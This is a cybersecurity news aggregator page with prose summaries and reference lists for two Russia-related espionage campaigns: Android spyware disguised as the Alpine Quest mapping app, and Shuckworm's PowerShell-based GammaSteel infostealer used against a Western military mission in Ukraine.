CyberSecurity news

FlagThis - #russian

info@thehackernews.com (The@The Hacker News //

Android Spyware Targets Russian Military Personnel

Russian military personnel are being targeted by a new Android spyware campaign that disguises itself as a legitimate Alpine Quest mapping application. The spyware, dubbed Android.Spy.1292.origin, is distributed through unofficial channels, including Russian Android app catalogs and a fake Telegram channel promoting a pirated "Pro" version of the app. Once installed, the trojanized app functions like the original Alpine Quest, a popular navigation tool used by outdoor enthusiasts and also relied upon by Russian soldiers in military zones due to its offline capabilities. This allows the malware to remain undetected while it secretly harvests sensitive data from the compromised device.

The spyware collects a wide range of information, including the user's phone number, contact lists, geolocation data, and a list of files stored on the device. This data is then sent to a remote command-and-control server and a Telegram bot controlled by the attackers. The attackers are particularly interested in retrieving confidential documents shared via messaging apps like Telegram and WhatsApp. The malware also targets a specific file called "locLog" created by Alpine Quest, which logs detailed user movement data. By stealing this file, the attackers can reconstruct the victim's movements over time, enabling surveillance.

Security researchers at Doctor Web discovered the campaign and noted the modular design of the spyware, which allows attackers to expand its capabilities by downloading additional modules. This can enable the exfiltration of specific content and execute a wider spectrum of malicious tasks. The attacks mirror tactics previously deployed by Russian groups against Ukrainian soldiers, seeking to access data from military apps and encrypted messaging apps. Experts advise downloading Android apps only from trusted app marketplaces and avoiding downloading "free" paid versions of software from dubious sources to mitigate the risk posed by such threats.

Share: bluesky twitterx--v2 facebook--v1 threads


References :
  • hackread.com: Fake Alpine Quest Mapping App Spotted Spying on Russian Military
  • Risky.Biz: Risky Bulletin: Russian military personnel targeted with Android spyware reminiscent of Russia's own tactics
  • Risky Business Media: Risky Bulletin: Russian military personnel targeted with Android spyware
  • The Hacker News: Android Spyware Disguised as Alpine Quest App Targets Russian Military Devices
  • bsky.app: Podcast: risky.biz/RBNEWS415/ Newsletter: https://news.risky.biz/risky-bulletin-russian-military-personnel-targeted-with-android-spyware-reminiscent-of-russias-own-tactics/ -Russian military personnel targeted with Android spyware reminiscent of Russia's own tactics -Hegseth involved in 2nd Signalgate scandal -two CISA Secure by Designs execs leave -Asian cyber scam call centers spread worldwide
  • The Hacker News: Android Spyware Disguised as Alpine Quest App Targets Russian Military Devices
  • BleepingComputer: Russian army targeted by new Android malware hidden in mapping app
  • github.com: Details on trojanized Alpine Quest app version
  • The Register - Security: Booby-trapped Alpine Quest Android app geolocates Russian soldiers
  • www.scworld.com: Spyware-laced app targeted Russian military phones
  • securityaffairs.com: Android spyware hidden in mapping software targets Russian soldiers
  • The DefendOps Diaries: Espionage Threats: Android.Spy.1292.origin and Military Cybersecurity
Classification:
  • HashTags: #Android #Spyware #Military
  • Company: Doctor Web
  • Target: Russian Military Personnel
  • Attacker: Russian
  • Product: Alpine Quest
  • Feature: Data Theft
  • Malware: Android.Spy.1292.origin
  • Type: Malware
  • Severity: Major
Pierluigi Paganini@Security Affairs //

Shuckworm APT Targets Ukraine with GammaSteel Malware

The Russia-linked cyber espionage group Shuckworm, also known as Gamaredon or Armageddon, is actively targeting a Western country's military mission based in Ukraine. The campaign, which began in February 2025 and continued through March, involves the deployment of an updated, PowerShell-based version of its GammaSteel infostealer malware. This latest wave of activity underscores Shuckworm's persistent focus on Ukrainian targets, with the group believed to be operating on behalf of Russia's Federal Security Service (FSB). They have historically concentrated their efforts on government, military, and law enforcement targets in Ukraine.

The initial infection vector in this campaign appears to be infected removable drives. Evidence from the Windows Registry's UserAssist key suggests that the infection was triggered from such an external drive. The attack chain is multi-staged and designed to minimize detection. It involves the execution of obfuscated VBScript and PowerShell scripts stored in the registry. This shift towards PowerShell-based tools allows Shuckworm to improve obfuscation and store scripts directly within the Windows Registry, making file-based detection more challenging.

GammaSteel, the malware deployed in this campaign, now has enhanced reconnaissance features. It is capable of capturing screenshots, gathering system information, and enumerating desktop contents and user documents. The malware targets specific file types such as documents, spreadsheets, and PDFs. Shuckworm's exfiltration methods have also become more sophisticated, utilizing PowerShell web requests or cURL with Tor proxies to extract sensitive data stealthily. This campaign demonstrates an increase in sophistication for Shuckworm, with the group leveraging legitimate web services to lower the risk of detection.

Share: bluesky twitterx--v2 facebook--v1 threads


References :
  • bsky.app: The Russian state-backed hacking group Gamaredon (aka "Shuckworm") has been targeting a military mission of a Western country in Ukraine in attacks likely deployed from removable drives.
  • cyberpress.org: Shuckworm Deploys PowerShell-Based GammaSteel Malware in Precision Attacks
  • gbhackers.com: Shuckworm Group Leverages GammaSteel Malware in Targeted PowerShell Attacks
  • The Hacker News: Shuckworm targets Western military mission
  • Broadcom Software Blogs: Shuckworm Targets Foreign Military Mission Based in Ukraine
  • gbhackers.com: The Russia-linked cyber-espionage group known as Shuckworm (also identified as Gamaredon or Armageddon) has been observed targeting a Western country’s military mission located within Ukraine, employing an updated, PowerShell-based version of its GammaSteel infostealer malware.
  • securityonline.info: Russia-linked espionage group Shuckworm (also known as Gamaredon or Armageddon) has launched a renewed and more sophisticated cyber campaign targeting a foreign military mission based in Ukraine, according to a detailed report by the Symantec Threat Hunter Team. This latest wave of activity, which began in February 2025 and continued through March, underscores Shuckworm’s relentless […]
  • BleepingComputer: The Russian state-backed hacking group Gamaredon (aka "Shuckworm") has been targeting a military mission of a Western country in Ukraine in attacks likely deployed from removable drives. [...]
  • securityonline.info: Shuckworm’s Sophisticated Cyber Campaign Targets Ukraine Military Mission
  • Cyber Security News: Shuckworm Deploys PowerShell-Based GammaSteel Malware in Precision Attacks
  • The Hacker News: Gamaredon Uses Infected Removable Drives to Breach Western Military Mission in Ukraine
  • www.bleepingcomputer.com: Russian hackers attack Western military mission using malicious drive
  • www.csoonline.com: Russian Shuckworm APT is back with updated GammaSteel malware
  • securityaffairs.com: Gamaredon targeted the military mission of a Western country based in Ukraine
  • The DefendOps Diaries: Explore Gamaredon's evolving cyber tactics targeting Western military missions with advanced evasion techniques and PowerShell tools.
  • www.sentinelone.com: Police arrest SmokeLoader malware customers, AkiraBot abuses AI to bypass CAPTCHAs, and Gamaredon delivers GammaSteel via infected drives.
  • PCMag UK security: A suspected state-sponsored Russian group may have developed the 'GammaSteel' attack to help them spy on and steal data from a military mission in Ukraine. A malware-laden storage drive may have helped Russia spy on military activities in Ukraine.
  • www.scworld.com: Infected removable drives were used to spread the malware.
  • Metacurity: Cybersecurity industry is mum on SentinelOne EO, Comptroller of the Currency lacked MFA on hacked email account, Morocco confirms massive cyber attack, Gamaredon is targeting Western military mission in Ukraine, Ethical hacker stole $2.6m from Morpho Labs, Sex chatbots leak information, much more
  • www.metacurity.com: Cybersecurity industry is mum on SentinelOne EO, Comptroller of the Currency lacked MFA on hacked email account, Morocco confirms massive cyber attack, Gamaredon is targeting Western military mission in Ukraine, Ethical hacker stole $2.6m from Morpho Labs, Sex chatbots leak information, much more
  • ciso2ciso.com: Gamaredon Uses Infected Removable Drives to Breach Western Military Mission in Ukraine – Source:thehackernews.com
  • ciso2ciso.com: The group targeted the military mission of a Western country, per the report. Infected removable drives have been used by the group.
  • Metacurity: Before you head out for a much-deserved weekend break after this insane week, check out today's Metacurity for the most critical infosec developments you should know, including --China acknowledged US cyberattacks at a secret meeting, report --Cybersecurity industry is mum on SentinelOne EO, --Comptroller of the Currency lacked MFA on hacked email account, --Morocco confirms massive cyber attack, --Gamaredon is targeting Western military mission in Ukraine, --Ethical hacker stole $2.6m from Morpho Labs, --Sex chatbots leak information, --much more
  • Security Risk Advisors: 🚩Shuckworm Compromises Western Military Mission in Ukraine Using Updated PowerShell GammaSteel Malware
  • Security Latest: For the past decade, this group of FSB hackers—including “traitorâ€Â Ukrainian intelligence officers—has used a grinding barrage of intrusion campaigns to make life hell for their former countrymen and cybersecurity defenders.
Classification:
  • HashTags: #APT #Ukraine #GammaSteel
  • Company: Symantec
  • Target: Ukraine Military
  • Attacker: Gamaredon
  • Product: PowerShell
  • Feature: GammaSteel
  • Malware: GammaSteel
  • Type: Espionage
  • Severity: Major

Posts

Blogs

Research Tools